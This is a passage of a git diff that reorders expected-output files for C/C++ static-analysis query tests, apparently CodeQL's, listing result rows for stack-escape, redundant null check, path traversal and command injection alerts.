test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | +| test.cpp:170:16:170:17 | Load: p3 | test.cpp:144:3:144:12 | Store: ... = ... 
| test.cpp:170:16:170:17 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:144:3:144:12 | Store: ... = ... | this store | +| test.cpp:171:17:171:18 | Load: p3 | test.cpp:145:3:145:16 | Store: ... = ... | test.cpp:171:17:171:18 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:145:3:145:16 | Store: ... = ... | this store | +| test.cpp:172:18:172:19 | Load: p2 | test.cpp:146:3:146:15 | Store: ... = ... | test.cpp:172:18:172:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:146:3:146:15 | Store: ... = ... | this store | +| test.cpp:173:18:173:19 | Load: p2 | test.cpp:147:3:147:19 | Store: ... = ... | test.cpp:173:18:173:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:147:3:147:19 | Store: ... = ... | this store | +| test.cpp:174:18:174:19 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:174:18:174:19 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | +| test.cpp:175:16:175:17 | Load: p1 | test.cpp:148:3:148:18 | Store: ... = ... | test.cpp:175:16:175:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:148:3:148:18 | Store: ... = ... | this store | +| test.cpp:177:14:177:21 | Load: access to array | test.cpp:151:3:151:15 | Store: ... = ... | test.cpp:177:14:177:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:151:3:151:15 | Store: ... = ... | this store | +| test.cpp:178:14:178:21 | Load: access to array | test.cpp:152:3:152:19 | Store: ... = ... 
| test.cpp:178:14:178:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:152:3:152:19 | Store: ... = ... | this store | +| test.cpp:179:14:179:21 | Load: access to array | test.cpp:153:3:153:18 | Store: ... = ... | test.cpp:179:14:179:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:153:3:153:18 | Store: ... = ... | this store | +| test.cpp:180:14:180:19 | Load: * ... | test.cpp:154:3:154:22 | Store: ... = ... | test.cpp:180:14:180:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:154:3:154:22 | Store: ... = ... | this store | +| test.cpp:181:13:181:20 | Load: access to array | test.cpp:155:3:155:21 | Store: ... = ... | test.cpp:181:13:181:20 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:155:3:155:21 | Store: ... = ... | this store | +| test.cpp:182:14:182:19 | Load: * ... | test.cpp:156:3:156:25 | Store: ... = ... | test.cpp:182:14:182:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:156:3:156:25 | Store: ... = ... | this store | +| test.cpp:239:17:239:17 | Load: p | test.cpp:234:3:234:13 | Store: ... = ... | test.cpp:239:17:239:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:232:7:232:7 | x | x | test.cpp:234:3:234:13 | Store: ... = ... | this store | +| test.cpp:268:17:268:17 | Load: p | test.cpp:263:3:263:13 | Store: ... = ... | test.cpp:268:17:268:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:260:7:260:7 | x | x | test.cpp:263:3:263:13 | Store: ... = ... | this store | 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected index 997de4af41fd..8ffb2330840e 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/RedundantNullCheckSimple/RedundantNullCheckSimple.expected 
@@ -1,21 +1,3 @@ -#select -| RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | the value is dereferenced | -| RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | the value is dereferenced | -edges -| RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... 
| RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | -| RedundantNullCheckSimple.cpp:3:8:3:8 | Load: p | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | -| RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | -| RedundantNullCheckSimple.cpp:10:12:10:12 | Load: p | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | -| RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | -| RedundantNullCheckSimple.cpp:19:8:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | -| RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | -| RedundantNullCheckSimple.cpp:78:8:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | -| RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | -| RedundantNullCheckSimple.cpp:92:18:92:18 | Load: p | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | nodes | RedundantNullCheckSimple.cpp:3:3:3:3 | VariableAddress: x | semmle.label | x | | RedundantNullCheckSimple.cpp:3:3:3:8 | Store: ... = ... | semmle.label | ... = ... | 
@@ -54,3 +36,21 @@ nodes | RedundantNullCheckSimple.cpp:93:9:93:10 | VariableAddress: sp | semmle.label | sp | | RedundantNullCheckSimple.cpp:93:13:93:13 | FieldAddress: p | semmle.label | p | | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | semmle.label | p | +edges +| RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | +| RedundantNullCheckSimple.cpp:3:8:3:8 | Load: p | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | +| RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | +| RedundantNullCheckSimple.cpp:10:12:10:12 | Load: p | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | +| RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | +| RedundantNullCheckSimple.cpp:19:8:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | +| RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | +| RedundantNullCheckSimple.cpp:78:8:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | +| RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | +| RedundantNullCheckSimple.cpp:92:18:92:18 | Load: p | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | +#select +| RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | RedundantNullCheckSimple.cpp:4:7:4:7 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:3:7:3:8 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... | RedundantNullCheckSimple.cpp:13:8:13:8 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:10:11:10:12 | Load: * ... 
| the value is dereferenced | +| RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | RedundantNullCheckSimple.cpp:20:7:20:8 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:19:7:19:9 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | RedundantNullCheckSimple.cpp:48:12:48:12 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:51:10:51:11 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | RedundantNullCheckSimple.cpp:79:7:79:9 | Load: * ... | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:78:7:78:10 | Load: * ... | the value is dereferenced | +| RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | RedundantNullCheckSimple.cpp:93:13:93:13 | Load: p | This null check is redundant because $@ in any case. | RedundantNullCheckSimple.cpp:92:13:92:18 | Load: * ... | the value is dereferenced | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected index 8ebb959ae4b5..031804b92251 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-022/SAMATE/TaintedPath/TaintedPath.expected 
@@ -1,5 +1,3 @@ -#select -| CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | data | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | This argument to a file access function is derived from $@ and then passed to fopen(filename). | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | user input (string read by fgets) | edges | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:62:25:62:46 | ... = ... | provenance | | | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:69:21:69:40 | ... = ... | provenance | | @@ -12,3 +10,5 @@ nodes | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:69:21:69:40 | ... = ... | semmle.label | ... = ... | | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | semmle.label | *data | subpaths +#select +| CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | data | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:77:23:77:26 | *data | This argument to a file access function is derived from $@ and then passed to fopen(filename). | CWE23_Relative_Path_Traversal__char_console_fopen_11.cpp:55:27:55:38 | fgets output argument | user input (string read by fgets) | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected index 784928db0533..bb1caa71e120 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/SAMATE/ExecTainted/ExecTainted.expected @@ -1,5 +1,3 @@ -#select -| tests.cpp:53:16:53:19 | data | tests.cpp:33:34:33:39 | *call to getenv | tests.cpp:53:16:53:19 | *data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | tests.cpp:33:34:33:39 | *call to getenv | user input (an environment variable) | tests.cpp:38:25:38:36 | strncat output argument | strncat output argument | edges | tests.cpp:26:15:26:23 | **badSource | tests.cpp:51:12:51:20 | *call to badSource | provenance | | | tests.cpp:33:34:33:39 | *call to getenv | tests.cpp:33:34:33:39 | *call to getenv | provenance | | @@ -20,3 +18,5 @@ nodes | tests.cpp:51:12:51:20 | *call to badSource | semmle.label | *call to badSource | | tests.cpp:53:16:53:19 | *data | semmle.label | *data | subpaths +#select +| tests.cpp:53:16:53:19 | data | tests.cpp:33:34:33:39 | *call to getenv | tests.cpp:53:16:53:19 | *data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | tests.cpp:33:34:33:39 | *call to getenv | user input (an environment variable) | tests.cpp:38:25:38:36 | strncat output argument | strncat output argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected index 24f63e6cfaa5..18dd45752ccb 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.expected 
@@ -1,28 +1,3 @@ -#select -| test.cpp:23:12:23:19 | command1 | test.cpp:15:27:15:30 | **argv | test.cpp:23:12:23:19 | *command1 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:15:27:15:30 | **argv | user input (a command-line argument) | test.cpp:22:13:22:20 | sprintf output argument | sprintf output argument | -| test.cpp:51:10:51:16 | command | test.cpp:47:21:47:26 | *call to getenv | test.cpp:51:10:51:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:47:21:47:26 | *call to getenv | user input (an environment variable) | test.cpp:50:11:50:17 | sprintf output argument | sprintf output argument | -| test.cpp:66:10:66:16 | command | test.cpp:63:9:63:16 | fread output argument | test.cpp:66:10:66:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:63:9:63:16 | fread output argument | user input (string read by fread) | test.cpp:65:11:65:17 | strncat output argument | strncat output argument | -| test.cpp:86:32:86:38 | command | test.cpp:83:9:83:16 | fread output argument | test.cpp:86:32:86:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:83:9:83:16 | fread output argument | user input (string read by fread) | test.cpp:85:11:85:17 | strncat output argument | strncat output argument | -| test.cpp:95:45:95:48 | path | test.cpp:92:9:92:16 | fread output argument | test.cpp:95:45:95:48 | *path | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. 
| test.cpp:92:9:92:16 | fread output argument | user input (string read by fread) | test.cpp:94:11:94:14 | strncat output argument | strncat output argument | -| test.cpp:109:18:109:22 | call to c_str | test.cpp:107:20:107:38 | *call to getenv | test.cpp:109:18:109:22 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:107:20:107:38 | *call to getenv | user input (an environment variable) | test.cpp:108:31:108:31 | call to operator+ | call to operator+ | -| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:10:115:23 | call to operator+ | call to operator+ | -| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:17:115:17 | call to operator+ | call to operator+ | -| test.cpp:121:25:121:28 | call to data | test.cpp:120:20:120:38 | *call to getenv | test.cpp:121:10:121:30 | *call to data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:120:20:120:38 | *call to getenv | user input (an environment variable) | test.cpp:121:17:121:17 | call to operator+ | call to operator+ | -| test.cpp:144:10:144:16 | command | test.cpp:141:9:141:11 | fread output argument | test.cpp:144:10:144:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). 
| test.cpp:141:9:141:11 | fread output argument | user input (string read by fread) | test.cpp:143:11:143:17 | sprintf output argument | sprintf output argument | -| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:178:13:178:17 | strncat output argument | strncat output argument | -| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:179:13:179:19 | strncat output argument | strncat output argument | -| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:181:13:181:19 | strncat output argument | strncat output argument | -| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:188:11:188:15 | strncat output argument | strncat output argument | -| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. 
| test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:189:11:189:17 | strncat output argument | strncat output argument | -| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | -| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | -| test.cpp:234:10:234:15 | buffer | test.cpp:231:19:231:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:231:19:231:33 | *call to getenv | user input (an environment variable) | test.cpp:231:11:231:16 | strncat output argument | strncat output argument | -| test.cpp:234:10:234:15 | buffer | test.cpp:232:19:232:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:232:19:232:33 | *call to getenv | user input (an environment variable) | test.cpp:232:11:232:16 | strncat output argument | strncat output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:243:5:243:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). 
| test.cpp:243:5:243:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:242:11:242:17 | sprintf output argument | sprintf output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:248:5:248:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:248:5:248:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | -| test.cpp:261:10:261:15 | buffer | test.cpp:259:21:259:35 | *call to getenv | test.cpp:261:10:261:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:259:21:259:35 | *call to getenv | user input (an environment variable) | test.cpp:259:13:259:18 | strncat output argument | strncat output argument | edges | test.cpp:15:27:15:30 | **argv | test.cpp:16:20:16:26 | *access to array | provenance | | | test.cpp:16:20:16:26 | *access to array | test.cpp:22:45:22:52 | *userName | provenance | | 
@@ -227,3 +202,28 @@ subpaths | test.cpp:197:26:197:33 | *filename | test.cpp:187:47:187:54 | *filename | test.cpp:187:19:187:25 | *command | test.cpp:197:10:197:16 | concat output argument | | test.cpp:197:26:197:33 | *filename | test.cpp:187:47:187:54 | *filename | test.cpp:187:19:187:25 | *command [Return] | test.cpp:197:10:197:16 | concat output argument | | test.cpp:197:26:197:33 | *filename | test.cpp:187:47:187:54 | *filename | test.cpp:187:19:187:25 | *command [Return] | test.cpp:197:10:197:16 | concat output argument | +#select +| test.cpp:23:12:23:19 | command1 | test.cpp:15:27:15:30 | **argv | test.cpp:23:12:23:19 | *command1 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:15:27:15:30 | **argv | user input (a command-line argument) | test.cpp:22:13:22:20 | sprintf output argument | sprintf output argument | +| test.cpp:51:10:51:16 | command | test.cpp:47:21:47:26 | *call to getenv | test.cpp:51:10:51:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:47:21:47:26 | *call to getenv | user input (an environment variable) | test.cpp:50:11:50:17 | sprintf output argument | sprintf output argument | +| test.cpp:66:10:66:16 | command | test.cpp:63:9:63:16 | fread output argument | test.cpp:66:10:66:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:63:9:63:16 | fread output argument | user input (string read by fread) | test.cpp:65:11:65:17 | strncat output argument | strncat output argument | +| test.cpp:86:32:86:38 | command | test.cpp:83:9:83:16 | fread output argument | test.cpp:86:32:86:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. 
| test.cpp:83:9:83:16 | fread output argument | user input (string read by fread) | test.cpp:85:11:85:17 | strncat output argument | strncat output argument | +| test.cpp:95:45:95:48 | path | test.cpp:92:9:92:16 | fread output argument | test.cpp:95:45:95:48 | *path | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:92:9:92:16 | fread output argument | user input (string read by fread) | test.cpp:94:11:94:14 | strncat output argument | strncat output argument | +| test.cpp:109:18:109:22 | call to c_str | test.cpp:107:20:107:38 | *call to getenv | test.cpp:109:18:109:22 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:107:20:107:38 | *call to getenv | user input (an environment variable) | test.cpp:108:31:108:31 | call to operator+ | call to operator+ | +| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:10:115:23 | call to operator+ | call to operator+ | +| test.cpp:115:25:115:29 | call to c_str | test.cpp:114:20:114:38 | *call to getenv | test.cpp:115:25:115:29 | *call to c_str | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:114:20:114:38 | *call to getenv | user input (an environment variable) | test.cpp:115:17:115:17 | call to operator+ | call to operator+ | +| test.cpp:121:25:121:28 | call to data | test.cpp:120:20:120:38 | *call to getenv | test.cpp:121:10:121:30 | *call to data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). 
| test.cpp:120:20:120:38 | *call to getenv | user input (an environment variable) | test.cpp:121:17:121:17 | call to operator+ | call to operator+ | +| test.cpp:144:10:144:16 | command | test.cpp:141:9:141:11 | fread output argument | test.cpp:144:10:144:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:141:9:141:11 | fread output argument | user input (string read by fread) | test.cpp:143:11:143:17 | sprintf output argument | sprintf output argument | +| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:178:13:178:17 | strncat output argument | strncat output argument | +| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:179:13:179:19 | strncat output argument | strncat output argument | +| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:181:13:181:19 | strncat output argument | strncat output argument | +| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. 
| test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:188:11:188:15 | strncat output argument | strncat output argument | +| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:189:11:189:17 | strncat output argument | strncat output argument | +| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | +| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | +| test.cpp:234:10:234:15 | buffer | test.cpp:231:19:231:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:231:19:231:33 | *call to getenv | user input (an environment variable) | test.cpp:231:11:231:16 | strncat output argument | strncat output argument | +| test.cpp:234:10:234:15 | buffer | test.cpp:232:19:232:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). 
